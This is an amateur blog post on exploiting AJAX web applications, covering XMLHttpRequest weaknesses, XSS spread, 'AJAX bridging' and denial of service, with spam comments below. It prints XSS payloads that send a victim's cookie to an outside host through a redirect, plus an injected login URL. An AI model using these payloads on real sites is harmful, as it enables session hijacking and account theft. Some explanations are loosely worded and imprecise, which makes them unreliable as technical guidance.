AJaX ExplOitatioN
Asalamu alailkum I am Malik Ubi and Today we will discuss about AJAX EXPLOITATION
So what is it and How can we perform it follow me and Lets play the game
.:AJAX Exploitation :.
Asynchronous JavaScript and XML (AJAX) is one of the latest technologies used by Web developers to provide a browsing experience like working on "local. " As a new technique there are still some security features that haven't been studied yet:- There are more -inputs- so, there are more “points” to protect.- Internal functions are exposed.- Contains no well-defined coding mechanisms when a client accesses to resources.- Not very efficient protecting the session and authentication credentials.
Vulnerabilities in XMLHTTPRequest object:
AJAX uses XMLHTTPRequest to handle all communication with the server application. When a client sends a request to a specific URL on the same server that contains the original page, can receive different responses. It is very useful to give some "capacity" to users within a web application. In addition XMLHTTPRequest can collect information from virtually all servers in the web, allowing to open different attack vectors and techniques through use (SQL Injections, XSS...)
XSS vulnerabilities using Ajax:
AJAX requests and operation of the browser are similar. Therefore, the server cannot differentiate them. That means that cannot know what requests are in the "background." For example, a program writted in -javascript- can use AJAX to request a resource that is in the background without the user noticing. The browser will automatically add everything you need for authentication or to send more requests, if necessary. This type of expansion greatly increases the possibility of XSS attack vector. Through AJAX, an attacker can launch different injections on specific pages to which the user is viewing. A XSS vector can use AJAX requests to inject himself in a very simple, and re-inject more vectors. Something like a virus, and also without having to "refresh" the web.
Example of “invisible” propagation through multiple HTTP requests: <script>alert("SCG09")</script> <script>document.location='http://tiendavirtual.com/pagina1.pl?'%20+document.cookie</script> Injected code: http://tiendavirtual.com/login.php? variable="><script>document.location='http://ejemplo2.com/foro.php?'+document.cookie</script>
The code will redirect the page to an external site, which in turn contains another page with malicious code just after the user is "logged" in the original page from which the request was maded.
Ajax Bridging: For security measures, AJAX applications only allows to connect from the website from which they come. That means that -javascript- with Ajax downloading from web A, cannot realize connections to web B (externaly at first). For allow it, is used some “bridge” services. The “bridge” works like proxy with the webserver, forwarding traffic between the -javascript- of the client side and the external web. Is like a web service, for the own website. An attacker can use this “feature” to access to restricted areas.
Denegation of service with AJAX:
<IMG SRC="http://tiendavirtual.com/cgi-bin/scriptx.cgi?a=b">
So as you see this was a basic Explanation of AJax Exploitation that i know, Learneδ and also shared with you
I hope u liked it :-D
#Mαℓïк_Цвï
Never seen article like this, thanks for the wonderful content.
ReplyDeleteCloud Computing Courses in Chennai
Hadoop Training in Chennai
Digital Marketing Course in Chennai
Selenium Training in Chennai
JAVA Training in Chennai
German Classes in chennai
Salesforce Training in Chennai
Salesforce Training
"This was a well written blog. Thanks for sharing.
ReplyDeleteDigital Marketing Training Course in Chennai | Digital Marketing Training Course in Anna Nagar | Digital Marketing Training Course in OMR | Digital Marketing Training Course in Porur | Digital Marketing Training Course in Tambaram | Digital Marketing Training Course in Velachery
"